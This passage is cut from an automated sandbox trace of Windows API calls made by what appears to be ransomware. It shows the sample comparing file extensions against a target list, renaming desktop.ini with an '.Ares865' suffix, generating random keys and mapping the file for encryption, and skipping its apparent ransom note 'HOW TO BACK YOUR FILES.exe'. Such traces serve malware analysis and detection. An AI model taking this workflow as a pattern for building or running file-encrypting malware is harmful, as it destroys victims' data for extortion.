(lpString1="ini", lpString2="rod") returned -1 [0039.390] lstrlenW (lpString="rodx") returned 4 [0039.390] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.390] lstrlenW (lpString="rpd") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.390] lstrlenW (lpString="rsd") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.390] lstrlenW (lpString="sas7bdat") returned 8 [0039.390] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.390] lstrlenW (lpString="sbf") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.390] lstrlenW (lpString="scx") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.390] lstrlenW (lpString="sdb") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.390] lstrlenW (lpString="sdc") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.390] lstrlenW (lpString="sdf") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.390] lstrlenW (lpString="sis") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.390] lstrlenW (lpString="spq") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.390] lstrlenW (lpString="te") returned 2 [0039.390] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.390] lstrlenW (lpString="teacher") returned 7 [0039.390] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.390] lstrlenW (lpString="tmd") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.390] lstrlenW (lpString="tps") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.390] lstrlenW (lpString="trc") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.390] lstrlenW (lpString="trc") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.391] lstrlenW (lpString="trm") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.391] lstrlenW (lpString="udb") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.391] lstrlenW (lpString="udl") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.391] lstrlenW (lpString="usr") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.391] lstrlenW (lpString="v12") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.391] lstrlenW (lpString="vis") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.391] lstrlenW (lpString="vpd") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.391] lstrlenW (lpString="vvv") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.391] lstrlenW (lpString="wdb") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.391] lstrlenW (lpString="wmdb") returned 4 [0039.391] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.391] lstrlenW (lpString="wrk") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.391] lstrlenW (lpString="xdb") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.391] lstrlenW (lpString="xld") returned 3 [0039.391] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.391] lstrlenW (lpString="xmlff") returned 5 [0039.391] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\desktop.ini.Ares865") returned 28 [0039.391] MoveFileExW (lpExistingFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\Users\\desktop.ini.Ares865" (normalized: "c:\\users\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0039.392] CreateFileW (lpFileName="C:\\Users\\desktop.ini.Ares865" (normalized: "c:\\users\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xf0 [0039.392] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0039.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3040020 [0039.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc5b0 [0039.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0039.392] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0039.393] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0039.393] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0039.393] CreateFileMappingW (hFile=0xf0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x108 [0039.425] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x1a0000 [0039.587] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0039.587] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0039.587] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc760 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cc760 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cc760 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d98 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2ccb80 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2ccd90 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2ccfa0 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20c) returned 0x2cd0a8 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2f8cd8 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccfa0 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2cd2c0 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2f8cf0 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eae48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8cf0 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2cd4d0 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccd90 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd2c0 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0a8 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd4d0 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8cd8 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0039.592] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0039.593] CloseHandle (hObject=0x108) returned 1 [0039.593] CloseHandle (hObject=0xf0) returned 1 [0039.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0039.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0039.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3040020 | out: hHeap=0x2b0000) returned 1 [0039.594] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4932e2c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4932e2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.594] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.594] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", 